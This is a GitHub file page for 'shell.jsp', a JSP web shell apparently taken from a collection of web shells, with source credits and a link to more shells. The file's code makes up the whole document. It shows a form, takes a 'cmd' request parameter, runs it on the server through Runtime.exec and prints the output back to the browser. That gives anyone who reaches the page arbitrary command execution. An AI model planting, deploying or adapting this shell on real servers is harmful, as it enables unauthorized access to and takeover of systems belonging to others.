-
-
Notifications
You must be signed in to change notification settings - Fork 154
/
shell.jsp
26 lines (26 loc) · 943 Bytes
/
shell.jsp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<%-- Source: https://gist.github.com/ErosLever/7445a3cfaaf80f1f5a53 --%>
<%-- For more JSP shells, visit the JSP directory at https://github.com/TheBinitGhimire/Web-Shells! --%>
<form method="GET" action="">
<input type="text" name="cmd" />
<input type="submit" value="Exec!" />
</form> <%!
public String esc(String str){
StringBuffer sb = new StringBuffer();
for(char c : str.toCharArray())
if( c >= '0' && c <= '9' || c >= 'A' && c <= 'Z' || c >= 'a' && c <= 'z' || c == ' ' )
sb.append( c );
else
sb.append("&#"+(int)(c&0xff)+";");
return sb.toString();
} %><%
String cmd = request.getParameter("cmd");
if ( cmd != null) {
out.println("<pre>Command was: <b>"+esc(cmd)+"</b>\n");
java.io.DataInputStream in = new java.io.DataInputStream(Runtime.getRuntime().exec(cmd).getInputStream());
String line = in.readLine();
while( line != null ){
out.println(esc(line));
line = in.readLine();
}
out.println("</pre>");
} %>